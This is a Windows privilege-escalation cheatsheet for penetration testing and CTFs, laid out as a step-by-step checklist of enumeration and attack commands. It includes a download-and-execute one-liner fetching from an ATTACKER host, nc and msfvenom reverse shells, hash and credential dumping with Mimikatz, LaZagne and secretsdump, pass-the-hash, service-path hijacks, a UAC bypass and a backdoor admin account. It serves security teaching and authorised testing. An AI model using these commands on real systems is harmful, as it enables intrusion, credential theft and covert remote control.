Windows Privilege Escalation Cheatsheet

Overview

Windows privilege escalation is usually less about running one exploit and more about following a consistent checklist. After landing a shell, the goal is to quickly understand the user context, host configuration, available privileges, stored credentials, service permissions, and domain position before moving into noisier techniques.

This cheatsheet follows a practical order: start with cheap enumeration, run automated tooling in the background, manually triage the highest-value findings, and leave kernel exploits as a last resort.

Only run these checks on systems you are authorised to test, such as labs, CTFs, or environments where you have written permission.

Methodology

The first few minutes after getting a shell should be structured. Stabilise the session if needed, identify the user and host context, then begin enumeration before touching potentially disruptive techniques.

Attack Chain

Stabilise the shell and confirm the current user context
Enumerate user privileges, groups, OS version, architecture, and patch level
Run automated enumeration while manually reviewing high-value areas
Search for stored credentials and password reuse opportunities
Check token privileges such as SeImpersonatePrivilege, SeBackupPrivilege, and SeRestorePrivilege
Review service misconfigurations, weak permissions, unquoted paths, and DLL hijacking opportunities
Inspect registry-based escalation paths such as AutoLogon, autoruns, and AlwaysInstallElevated
Review scheduled tasks and startup folders for writable targets
Enumerate installed software, drivers, and local attack surface
Check domain context if the host is domain-joined
Use UAC bypasses only when already local admin at medium integrity
Consider kernel exploits only when safer paths are exhausted

Initial System & User Enumeration

Always start by identifying who you are, what privileges you have, and what kind of Windows host you are on. These checks shape the rest of the escalation path.

User Context

whoami
whoami /priv
whoami /groups
whoami /all

whoami /priv is especially important because token privileges can immediately reveal a path to SYSTEM, especially on service accounts such as IIS, MSSQL, or backup-related users.

Local Users and Groups

net user
net user %USERNAME%
net localgroup
net localgroup administrators
net accounts

This helps identify whether the current user is a local admin, belongs to a privileged group, or is subject to unusual account policy settings.

Host and Patch Level

hostname
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
wmic qfe get Caption,Description,HotFixID,InstalledOn

The OS version, build, architecture, and installed patches are useful for exploit mapping. They are also important when choosing tools that depend on Windows version or .NET support.

Environment and Drives

set
echo %PATH%
wmic logicaldisk get caption,description,providername

The environment can reveal custom paths, writable directories, mapped drives, or operational clues left by administrators.

PowerShell Equivalents

$env:USERNAME
$env:COMPUTERNAME
$env:USERDOMAIN
[System.Environment]::OSVersion
Get-LocalUser
Get-LocalGroupMember Administrators
Get-HotFix | Sort-Object InstalledOn -Descending

PowerShell often gives cleaner output and is useful when working through WinRM or a constrained cmd.exe shell.

Automated Enumeration

Automated tools should not replace manual review, but they are excellent for catching common issues while you investigate manually.

Common Tools

Tool	Use
`winPEAS.exe` / `winPEASany.exe`	Broad Windows enumeration with likely wins highlighted
`PowerUp.ps1`	Services, registry checks, DLL hijacking, and common privilege escalation paths
`Seatbelt.exe`	Host survey covering credentials, browser data, RDP, services, and more
`JAWS`	Lightweight PowerShell enumeration
`Watson` / `Sherlock`	Missing patch and public exploit mapping
`accesschk.exe`	Manual ACL and permission inspection

Example Usage

winPEASx64.exe quiet cmd
Seatbelt.exe -group=all

For PowerUp, a one-liner can be useful when execution policy gets in the way.

powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/PowerUp.ps1'); Invoke-AllChecks"

Run one or two of these in the background, but still manually confirm anything they flag before attempting exploitation.

Stored Credentials & Password Hunting

Stored credentials are one of the highest-return categories in Windows privilege escalation. Look for passwords in files, registry keys, PowerShell history, configuration files, browser data, and unattended install files.

Search Files by Content

findstr /si "password" *.txt *.ini *.config *.xml *.ps1 *.bat *.cmd 2>nul
findstr /si "passwd" *.txt *.ini *.config *.xml 2>nul

Search Files by Name

dir /s /b *pass* *cred* *vnc* *.kdbx *.config 2>nul

Configuration files and KeePass databases are worth checking carefully. Even if they do not contain direct credentials, they may reveal usernames, hostnames, or services to target.

Unattended Install Files

type C:\Windows\Panther\Unattend.xml 2>nul
type C:\Windows\Panther\Unattended.xml 2>nul
type C:\Windows\System32\sysprep\sysprep.xml 2>nul
type C:\Windows\System32\sysprep\sysprep.inf 2>nul
type C:\unattend.xml 2>nul

Unattended installation files sometimes contain local administrator passwords or domain join credentials.

Group Policy Preferences

dir /s /b \\<DC>\SYSVOL\*.xml 2>nul
findstr /si "cpassword" \\<DC>\SYSVOL\*.xml

If a cpassword value is found, it can usually be decrypted because the historical Group Policy Preferences AES key is public.

Registry Credentials

Check for AutoLogon credentials first.

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

Then check common third-party tools.

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
reg query "HKLM\SOFTWARE\RealVNC\WinVNC4" /v password
reg query HKCU\Software\ORL\WinVNC3\Password
reg query HKCU\Software\TightVNC\Server

Saved Credentials and PowerShell History

cmdkey /list
dir /a %USERPROFILE%\AppData\Local\Microsoft\Credentials\
dir /a %USERPROFILE%\AppData\Roaming\Microsoft\Credentials\
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

PowerShell history is a common source of cleartext credentials, especially in lab environments where administrators test commands interactively.

Browser and Application Secrets

LaZagne.exe all

Tools such as LaZagne, SharpChrome, or manual browser profile inspection can reveal saved credentials, cookies, or tokens. Treat these as sensitive and only use them within authorised scope.

Pass-the-Hash Before Cracking

If you recover an NTLM hash, do not assume it must be cracked first. Test pass-the-hash where appropriate.

evil-winrm -i <target> -u <user> -H <ntlm_hash>
impacket-psexec <domain>/<user>@<target> -hashes :<ntlm_hash>

Token Privilege Abuse

Token privileges can create very fast escalation paths. Run whoami /priv early and review anything assigned to the current user.

High-Value Privileges

Privilege	Common Abuse Path
`SeImpersonatePrivilege`	`PrintSpoofer`, `GodPotato`, `JuicyPotatoNG`, `RoguePotato`
`SeAssignPrimaryTokenPrivilege`	Potato-family attacks in suitable contexts
`SeBackupPrivilege`	Read protected files such as `SAM`, `SYSTEM`, and `NTDS.dit`
`SeRestorePrivilege`	Replace protected files or service binaries
`SeTakeOwnershipPrivilege`	Take ownership of sensitive files and overwrite them
`SeDebugPrivilege`	Inject into or dump privileged processes
`SeLoadDriverPrivilege`	Load a vulnerable or malicious driver
`SeManageVolumePrivilege`	Abuse volume-level access to read sensitive files
`SeTcbPrivilege`	Extremely powerful; effectively game over

SeImpersonatePrivilege

SeImpersonatePrivilege is common on service accounts such as IIS and MSSQL. If enabled, potato-family tools may provide a direct path to SYSTEM.

PrintSpoofer.exe -i -c cmd
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "C:\Temp\nc.exe ATTACKER 4444 -e cmd"

Use the tool that matches the OS version and patch level. Older techniques may fail on newer builds, while newer potato variants often work in more modern lab environments.

SeBackupPrivilege

Backup privileges can allow sensitive registry hives to be saved even when normal users cannot read them directly.

reg save HKLM\SYSTEM C:\Temp\system.hiv
reg save HKLM\SAM C:\Temp\sam.hiv
reg save HKLM\SECURITY C:\Temp\security.hiv

Dump the hashes offline from the attacking machine.

impacket-secretsdump -sam sam.hiv -system system.hiv -security security.hiv LOCAL

On a domain controller, SeBackupPrivilege may also allow copying NTDS.dit through a shadow copy workflow.

Service Misconfigurations

Windows services are a classic escalation path. Focus on services running as privileged accounts where the current user can modify the service configuration, replace the binary, or write to a directory in the service path.

Unquoted Service Paths

List services and review binary paths.

sc query state= all
wmic service get name,displayname,pathname,startmode
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\\windows\\"

If a service path contains spaces and is not quoted, Windows may search for executable names earlier in the path. For example, an unquoted path such as:

C:\Program Files\Some Folder\service.exe

may allow execution of C:\Program.exe if that location is writable and the service restarts.

Weak Service Permissions

Use accesschk to review who can modify service configuration.

accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv <username> *
accesschk.exe /accepteula -uwcqv "BUILTIN\Users" <ServiceName>

Check the on-disk binary permissions as well.

accesschk.exe /accepteula -quvw "C:\Path\To\service.exe"

If you have SERVICE_CHANGE_CONFIG, you may be able to modify the service binPath and execute a command as the service account.

sc config <ServiceName> binPath= "cmd /c net user pwn Pwn123! /add && net localgroup administrators pwn /add"
sc stop <ServiceName>
sc start <ServiceName>

DLL Hijacking

DLL hijacking becomes interesting when a privileged service tries to load a missing DLL from a writable directory.

Use Process Monitor when you have GUI access, filtering for:

NAME NOT FOUND
.dll

From a shell, check whether any directories in %PATH% are writable.

for %A in ("%path:;=";"%") do @(cacls %A 2>nul | findstr /i "everyone authenticated users builtin")

If a writable path is abused, drop a malicious DLL with the expected name and restart the affected service.

Registry-Based Escalations

Registry misconfigurations can expose credentials or allow code execution through installer policies and autoruns.

AlwaysInstallElevated

This path is only exploitable when both the HKCU and HKLM values are set to 1.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If both are enabled, create an MSI payload and install it.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f msi -o evil.msi

msiexec /quiet /qn /i evil.msi

Autorun Keys

Review autorun locations and check whether the referenced binaries or registry keys are writable.

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

Check key permissions with accesschk.

accesschk.exe /accepteula -kvuqsw "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"

If you can modify an autorun entry that executes in a privileged context, it may become an escalation or persistence path.

Scheduled Tasks & Startup Items

Scheduled tasks often run as SYSTEM or an administrative user. The key is not only who the task runs as, but whether the script or binary it launches is writable.

schtasks /query /fo LIST /v
schtasks /query /fo LIST /v | findstr /i "TaskName Run As User"

Check common startup folders as well.

dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
dir "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"

If a task runs as a privileged account and points to a writable script or binary, replace or modify the target and wait for execution, or trigger the task manually if permitted.

accesschk.exe /accepteula -quv "C:\Path\To\Scripted.bat"

Installed Software & Vulnerable Drivers

Installed software can introduce local privilege escalation paths, especially when old versions run privileged services.

wmic product get name,version,vendor
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
reg query "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall" /s

Review running processes and services for third-party software, AV/EDR, backup agents, database services, and remote management tools.

tasklist /svc
tasklist /v

Drivers are also worth reviewing, especially for bring-your-own-vulnerable-driver scenarios.

driverquery /v

Cross-reference suspicious drivers with resources such as the LOLDrivers project, exploit databases, and vendor advisories.

Network & Active Directory Context

If the machine is domain-joined, local privilege escalation may not be the only path. Domain context can reveal reachable systems, domain users, groups, and trust relationships.

Network Basics

ipconfig /all
route print
arp -a
netstat -ano

This helps identify additional interfaces, routes, listening services, and internal hosts that may not be visible externally.

Domain Enumeration

net view /domain
net group /domain
net group "Domain Admins" /domain
net user /domain
nltest /dclist:<domain>

Without RSAT, basic LDAP-style enumeration can still be performed from PowerShell.

([adsisearcher]'(objectClass=user)').FindAll() | % { $_.Properties.samaccountname }

For full Active Directory mapping, collect data with SharpHound and analyse it in BloodHound.

SharpHound.exe -c All

UAC Bypass

UAC bypasses are only useful in a specific situation: the current user is already a local administrator, but the session is running at medium integrity.

Check the integrity level.

whoami /groups | findstr /i "Mandatory"

Common bypass families vary by Windows build and patch level. Examples include:

fodhelper.exe
computerdefaults.exe
sdclt.exe
eventvwr.exe

A common fodhelper technique modifies the current user’s registry hive and then launches fodhelper.exe.

New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd.exe"
Start-Process "C:\Windows\System32\fodhelper.exe"

Tools such as UACME can help map bypass methods to specific Windows versions, but they should be used carefully because UAC bypass behaviour changes across builds.

Kernel Exploits

Kernel exploits should be treated as a last resort. They are noisy, can crash the target, and are often unnecessary if credential, privilege, or service abuse paths exist.

Before using a kernel exploit, collect the exact OS details.

systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn

Then map missing patches to known vulnerabilities using tools such as Watson, Sherlock, or wesng.

wes.py systeminfo.txt

Common older targets worth recognising include:

MS16-032 — Secondary Logon
MS15-051 / MS14-058 — win32k
CVE-2020-0796 — SMBGhost
CVE-2021-36934 — HiveNightmare / SeriousSAM
CVE-2021-1675 / CVE-2021-34527 — PrintNightmare
CVE-2022-26904 — User Profile Service

Only use public exploit code when you have matched the OS build, architecture, and patch state carefully.

Post-Exploitation Quick Wins

Once SYSTEM or local administrator access is achieved, the next step is usually credential recovery, proof collection, or domain escalation, depending on scope.

Dump Local Hashes

reg save HKLM\SAM C:\Temp\sam
reg save HKLM\SYSTEM C:\Temp\system
reg save HKLM\SECURITY C:\Temp\security

impacket-secretsdump -sam sam -system system -security security LOCAL

Mimikatz Essentials

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam
mimikatz # lsadump::secrets

Noisy Lab-Only Persistence

In a lab or CTF, adding a local admin user can be a quick way to confirm control. In real engagements, this should only be done if explicitly allowed by the rules of engagement.

net user pwn Pwn123! /add
net localgroup administrators pwn /add
net localgroup "Remote Desktop Users" pwn /add

Recommended Check Order

Use this as a quick mental checklist after getting a shell.

Run whoami /all, systeminfo, and hostname
Drop winPEAS and Seatbelt, then let them run in the background
Check whoami /priv for token abuse opportunities
Search for stored credentials in unattended files, GPP, registry, history, browser data, and config files
Review service permissions, unquoted paths, writable binaries, and DLL hijacking opportunities
Check registry escalation paths such as AlwaysInstallElevated and autoruns
Review scheduled tasks and startup folders for writable targets
Enumerate installed software and vulnerable drivers
Enumerate Active Directory context if the host is domain-joined
Consider UAC bypass only if already local admin at medium integrity
Use kernel exploits only as a last resort

Essential Toolbox

Category	Tools
Enumeration	`winPEAS`, `Seatbelt`, `PowerUp`, `JAWS`, `Watson`, `accesschk`
Token abuse	`PrintSpoofer`, `GodPotato`, `JuicyPotatoNG`, `RoguePotato`
Credential dumping	`Mimikatz`, `LaZagne`, `SharpChrome`, `nanodump`, `pypykatz`, `secretsdump.py`
Active Directory	`SharpHound`, `BloodHound`, `Rubeus`, `Certify`, `ADRecon`
UAC	`UACME`
Patch mapping	`wesng`, `Watson`, `Sherlock`
Driver abuse	`LOLDrivers`

References

HackTricks — Windows Local Privilege Escalation
PayloadsAllTheThings — Windows Privilege Escalation
FuzzySecurity — Windows Privilege Escalation Fundamentals
Sushant 747 — Windows PrivEsc Guide
LOLBAS Project
LOLDrivers Project

Key Takeaways

Windows privilege escalation rewards methodical enumeration. The most reliable paths usually come from stored credentials, token privileges, weak service permissions, and registry or scheduled task misconfigurations. Kernel exploits should be saved for cases where safer, more deterministic paths have been exhausted.

Overview#

Methodology#

Attack Chain#

Initial System & User Enumeration#

User Context#

Local Users and Groups#

Host and Patch Level#

Environment and Drives#

PowerShell Equivalents#

Automated Enumeration#

Common Tools#

Example Usage#

Stored Credentials & Password Hunting#

Search Files by Content#

Search Files by Name#

Unattended Install Files#

Group Policy Preferences#

Registry Credentials#

Saved Credentials and PowerShell History#

Browser and Application Secrets#

Pass-the-Hash Before Cracking#

Token Privilege Abuse#

High-Value Privileges#

SeImpersonatePrivilege#

SeBackupPrivilege#

Service Misconfigurations#

Unquoted Service Paths#

Weak Service Permissions#

DLL Hijacking#

Registry-Based Escalations#

AlwaysInstallElevated#

Autorun Keys#

Scheduled Tasks & Startup Items#

Installed Software & Vulnerable Drivers#

Network & Active Directory Context#

Network Basics#

Domain Enumeration#

UAC Bypass#

Kernel Exploits#

Post-Exploitation Quick Wins#

Dump Local Hashes#

Mimikatz Essentials#

Noisy Lab-Only Persistence#

Recommended Check Order#

Essential Toolbox#

References#

Key Takeaways#